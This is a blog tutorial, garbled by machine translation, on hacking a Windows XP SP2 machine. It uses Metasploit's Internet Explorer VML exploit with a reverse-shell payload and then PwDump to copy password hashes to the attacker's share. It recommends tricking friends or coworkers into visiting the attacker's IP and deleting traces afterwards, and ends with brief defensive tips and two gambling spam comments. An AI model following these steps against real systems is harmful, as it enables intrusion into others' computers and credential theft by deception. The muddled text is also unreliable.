Learning Hack Windows XP SP2

/ On : 2:08 AM/ Thank you for visiting my small blog here. If you wanted to discuss or have the question around this article, please contact me e-mail at Crieshna@gmail.com.
After learning some basic concepts and 'standard' of the hack dibagian discussed first, and know a little about the exploits of the material on the second part, we wrote a direct-current practice. Here I am deliberately using VMWare to simulate, because not everyone can be practiced in a network. By using VMware,

we can simulate a simple network as if there is a network consisting of our own computer and other computers. For those who can not use VMWare, try searching the internet! Operating System I use is Windows XP SP2.
Tools that I use is the Metasploit Framework to do exploits and PwDump6 to take a hash file from the target computer. What is Metasploit Framework?


    The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
For more information about the use of Metasploit, you can read the documentation are also included in the installation. Metasploit to install version 2.7, users needed administrator. Earlier I tried to install a 'limited user' but once installed can not run. Actually this metasploit installation extracts the files only. So you can install it without having to get the user admin and put it anywhere without having to install in the Program Files folder. But after a little dioprek, it does not have to admin that can run. Rather ribet and males are also still writing here, because when I try the latest version, the version 3 Beta 3, we can run it without having to install the admin user. Gitu aja ko repot! Moreover, version 3 (skarang msh beta) is more sophisticated and more features. But unfortunately for msfweb (web version) can not be fully implemented.
Ok .. now I Assume you have read the userguide metasploit (ah.. at least my assumption is wrong; p). More plasticity Let cool and understand the details, I explained that using the console metasplooit (mfsconsole) only. Metasploit using cygwin to run it, because metasploit created using Perl. Now let's practice!
Pertama2 run 'mfsconsole'!
main1.JPG
To learn what the command is in MSFConsole use the command 'help'.
Because the computer you want to target is Windows XP SP2, then used exploits affecting XP SP2 is by Exploiting weaknesses in Internet Explorer vml Fill Method Code Execution.

    This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the vml processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
To see the info from these exploits use the command:

    msf> info ie_vml_rectfill
Exploit weaknesses in ie_vml_rectfill use Internet Explorer. Therefore, this exploit will have an effect if the target computer running IE and its direct url to the computer attackers. For that, we must use a little 'social engineering', as if in a boarding / lab / office we say to our friends that we're trying to create new web applications, and for help viewed using IE to an IP address (or computer name) us. Http://192.168.186.1 suppose. Usually after this exploit is run and the target computer has been connected, then IE will crash. Take a few moments to let the exploit 'works'. After a few moments to say wrote "well .. ya no errors. Ok deh .. My first try ... thanks betulin yes". New cover his pake IE Task Manager (TM pake although, IE msh hard to kill, do not forget to'end process' a 'dumpred.exe' too, but after the exploit works:-D).

To use the following exploits perintah2 use in the console:

    msf> use_ie_vml_rectfill

    msf> set payload win32_reverse

    msf> set RHOST ip_target

    msf> set LHOST ip_penyerang

   msf> exploit
The result will look like the following picture:
exploit1.JPG
In the example above, the target computer's IP (RHOST) is 192,168,186,128, and attackers computer (LHOST) is 192.168.186.1. Then 'payload' is used is 'win32_reverse' and the HTTP port is 80 (default http port). After running the command 'exploit', then we ask the target computer to run IE and directs them to the url of our computers. This process will take some time, even sometimes not successful. So try to keep aja:-D
If you succeed, then you will get a 'cmd.exe' from the target computer.

Crack da Password!
Well, after we 'control' the target computer, we see skalian wrote his password. Way similar to my previous article about Win XP SP2 Hack Password, but because it is remote, we must 'provide' the requisite PwDump programs. In order for this method successfully, I Assume on the target computer users who are logged in have admin access. Klo users who use the target computer that was used IE user only 'normal', pwdump will not work!
First we used to share PwDump from our computers with full access so that we can upload the dump target computer passwords, but with the suffix '$' let me not see a public computer. Suppose the name of the folder in the share PwDump $. Then from the console to succeed dihack, take PwDump the Map Network Drive from your computer with 'net use'. Examples of commands used:
pwdump.JPG
After that copy Pwdump to the target computer in the temporary folder, 'temp'. After successfully Pwdump be copied to the target computer, run the command Pwdump
C: \ temp \ Pwdump-o pass.txt 127.0.0.1
Klo successfully will appear in the following figure.

dump1.JPG

Then copy the file to your computer pass.txt us
C: \ temp \ copy pass.txt z:
And finally, do not leave a trace that we had stopped over there.
clean.JPG
Well, udah dapet a hash of his files. Living in crack aja deh .... (read the previous article for nge-crack passwords).
Actually there are many who can dioprek from metasploit. In many metasploit exploit, payload, meterpreter, etc. very 'nice' for dioprek. To learn metasploit, there disitusnya pretty good documentation.
Happy Hacking ... ..
Some suggestions for how we stay safe windows to exploit the above.
1. Do not use Internet Explorer. Use Mozilla Firefox or Opera!.
2. Patch your Windows.
3. Use antivirus with latest update
4. Be careful of your own friends ..

2 comments:

judi online said...

SELAMAT DATANG DI WWW.TOKO4D.NET
*** 1 USER ID UNTUK SEMUA GAME ***
SPORTBOOK | LIVECASINO | E-GAMES | TOGEL | POKER | SABUNGAYAM
Toko4d Tersedia 8 Pasaran Terbaik...
Discount : 2D : 29% | 3D : 59% | 4D : 66%
www.prediksitogeltoko4dd.blogspot.com
- Singapore
- Sydney
- Hongkong
- Magnum4d
- Kuching
- Wales
- Serbia
- Petaling
Promo Terbaru TOKO4D.NET :
- Bonus Deposit MEMBER BARU Sportbook 100%
- Bonus Deposit Sportbook 30% Setiap Hari
- Bonus Deposit 10% Setiap Hari Untuk Semua Game
- Bonus Casino Rollingan 0.8% Setiap Hari Senin
- Bonus Cashback Sabungayam 15%
- Bonus Cashback Sportbook 15%
- Bonus Cashback E-Games 20%
- Bonus Cashback Mixparlay 100%
- Bonus Rollingan Poker & domino 0,3%
- Bonus Referall 2% Semua Game
- Bonus Referall 1% dari member Togel
MIN DEPO & WD CUMA Rp.50.000,-
BCA - MANDIRI - BRI - BNI - DANAMON
UNTUK INFORMASI SELANJUTNYA BISA HUB KAMI DI :
LIVECHAT TOKO4D.NET 24 JAM ONLINE
Pin BBM : D8AEF213 | 2BAA30F5
LINE : TOKO4D
WECHAT : TOKO4DCS1
SKYPE : TOKO4D
GMAIL : toko4d@gmail.com
WA +855973820012

Togel Online
Kasino Online
Agen Sabung Ayam
Judi Casino
Agen Casino
Agen Togel
Judi Togel
Agen Judi
Judi Online
Judi Casino
Agen Casino
Judi Bola
Agen Bola

judi online said...

SELAMAT DATANG DI WWW.TOKO4D.NET
*** 1 USER ID UNTUK SEMUA GAME ***
SPORTBOOK | LIVECASINO | E-GAMES | TOGEL | POKER | SABUNGAYAM
Toko4d Tersedia 8 Pasaran Terbaik...
Discount : 2D : 29% | 3D : 59% | 4D : 66%
www.prediksitogeltoko4dd.blogspot.com
- Singapore
- Sydney
- Hongkong
- Magnum4d
- Kuching
- Wales
- Serbia
- Petaling
Promo Terbaru TOKO4D.NET :
- Bonus Deposit MEMBER BARU Sportbook 100%
- Bonus Deposit Sportbook 30% Setiap Hari
- Bonus Deposit 10% Setiap Hari Untuk Semua Game
- Bonus Casino Rollingan 0.8% Setiap Hari Senin
- Bonus Cashback Sabungayam 15%
- Bonus Cashback Sportbook 15%
- Bonus Cashback E-Games 20%
- Bonus Cashback Mixparlay 100%
- Bonus Rollingan Poker & domino 0,3%
- Bonus Referall 2% Semua Game
- Bonus Referall 1% dari member Togel
MIN DEPO & WD CUMA Rp.50.000,-
BCA - MANDIRI - BRI - BNI - DANAMON
UNTUK INFORMASI SELANJUTNYA BISA HUB KAMI DI :
LIVECHAT TOKO4D.NET 24 JAM ONLINE
Pin BBM : D8AEF213 | 2BAA30F5
LINE : TOKO4D
WECHAT : TOKO4DCS1
SKYPE : TOKO4D
GMAIL : toko4d@gmail.com
WA +855973820012

Togel Online
Kasino Online
Agen Sabung Ayam
Judi Casino
Agen Casino
Agen Togel
Judi Togel
Agen Judi
Judi Online
Judi Casino
Agen Casino
Judi Bola
Agen Bola

Post a Comment

Your Ad Here

artikel

site

Yahoo bot last visit powered by MyPagerank.NetMsn bot last visit powered by MyPagerank.Net